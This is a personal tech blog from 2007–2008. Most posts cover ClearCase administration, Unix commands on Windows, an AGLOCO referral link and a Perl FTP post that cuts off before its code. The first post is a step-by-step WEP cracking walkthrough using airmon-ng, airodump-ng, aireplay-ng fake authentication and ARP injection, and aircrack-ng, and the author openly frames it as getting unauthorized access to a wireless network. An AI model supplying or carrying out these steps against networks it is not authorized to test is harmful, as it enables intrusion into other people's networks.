Thursday, May 8, 2008

My first experience in WEP hacking

Is been years I thinking and wonder how to hack AP to get unauthorized access into wireless network.

I finally done it. Thanks to my friend provide me supported hardware (WG2000 with chipset zd1211) and a friend with kernel hacker expert :)


Here is the operating system environment:

FedoraCore 6 (kernel version 2.6.23.17)

- ieee80211.patch

- zd12111_firmware1.4

- zd1211rw.patch



Hacking WEP steps:

0. Enable Wireless adaptor with monitor mode
-> airmon-ng start [adaptor_interface]
-> airmon-ng start wlan0



1. View surounding APs
-> airodump-ng
-> airodump-ng wlan0



2. Target single AP and Channel, then start capturing the packet info
-> airodump-ng -c [channel] --bssid [ap_mac] -w [outfilename] [adaptor_interface]

3. Do fake authentication
-> aireplay-ng -1 0 -e [ap_name] -a [ap_mac] -h [adaptor_mac] [adaptor_interface]

4. Keep fake authenication alive
-> aireplay-ng -1 6000 -o 1 -q 10 -e [ap_name] -a [ap_mac] -h [adaptor_mac][adaptor_interface]

5. Make packet injection with arp attack
-> aireplay-ng -3 -b [ap_mac] -h [adaptor_mac] [adaptor_interface]

6. Crack the AP KEY with .cap
-> aircrack-ng -z -b [ap_mac] [outfilename].cap
-> aircrack-ng -b [ap_mac] [outfilename].cap

Steps 5 and 6 can be executed parallel :D

Tuesday, May 6, 2008

Search for latest version of branch type

To search latest version number for specific branch type:

cleartool find /vobs/vobname -branch "brtype(branchtypename)" -version "version(.../branchtypename/LATEST)" -print tee brantypelist.txt

The example result will be:

/vobs/vobname/filename1@@/main/branchtypename/3

/vobs/vobname/filename2@@/main/branchtypename/2

/vobs/vobname/filename3@@/main/branchtypename/6

Wednesday, August 1, 2007

Remove Corrupted View in Rational ClearCase

Objective: Remove Corrupted View

Error message below you get when you remove a view failed where the view is corrupted

cleartool rmview -tag viewname
cleartool: Error: Unable to open file"/view_stg/viewname.vws/.view": No such file or directory.
cleartool: Error: /view_stg/viewname.vws isn't a view: No such file or directory
cleartool: Error: Unable to remove view "/view_stg/viewname.vws".

Steps to remove the corrupted view:
1. list the view detail to get uuid

cleartool lsview -long viewname
Tag: viewname
Global path: /view_stg/viewname.vws
Server host: servername
Region: region_ux
Active: NO View tag
uuid:9e9c4e46.3f5311dc.86cc.00:14:c2:65:50:79
View on host: zmy12vw1
View server access path: /view_stg/viewname.vws
View uuid: 9e9c4e46.3f5311dc.86cc.00:14:c2:65:50:79
View owner: you

2. Then try remove the view again with uuid
cleartool rmview -vob /vobname -uuid 9e9c4e46.3f5311dc.86cc.00:14:c2:65:50:79
Can't remove view "/view_stg/viewname.vws" from VOB while view still exists.
Remove view /view_stg/viewname.vws" references from VOB anyway? [no] y
Removed references to view "9e9c4e46.3f5311dc.86cc.00:14:c2:65:50:79" from VOB "/vobname".

3. Lastly remove the view tag after all the vob references are removed
cleartool rmtag -view viewname


Reference:
http://www.philforhumanity.com/ClearCase_Support_4.html
http://publib.boulder.ibm.com/infocenter/cchelp/v7r0m0/index.jsp?topic=/com.ibm.rational.clearcase.books.cc_admin.doc/view-admin.htm

Thursday, July 19, 2007

Find Existing Label Type in VOB

To detect or verify the existent of label type in VOB:

cleartool lstype -kind lbtype -short -invob /vobs/vobname grep labeltypename

If the command above return NULL or blank, this mean this label type is not existed.
If return value, the "labeltypename" will be shown and also indicate the label type is locked or not.

Thursday, July 5, 2007

How to make UNIX / LINUX command in DOS

Well I usually work in Unix environment. And now get shifted to do work in windows environment. It take me more time to change my style and make me have a lot of error messages such as:

C:\>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

Here is the solution if you want to have same command in Windows as Unix or Linux.
Just download the zip file and extracted it to C: and set your user environment.
PATH=C:\custom-path

http://channel9.msdn.com/ShowPost.aspx?PostID=51329

Thursday, June 7, 2007

Suft Internet and Earn Money $$

Hi everyone,

AGLOCO community has introduce new method to earn extra money!
Is easy, just sign up and download the search bar.
Use it to search as you search using google.
The results are same as Google search except you earn money this time :D

Click the link below to join:
http://www.agloco.com/r/BBCV4101

Wednesday, May 30, 2007

How to PERL FTP

This week I brought FTP code which works using PERL:

This FTP code works on both Windows and UNIX environment.
This is a nice part of PERL :D
See the example code below: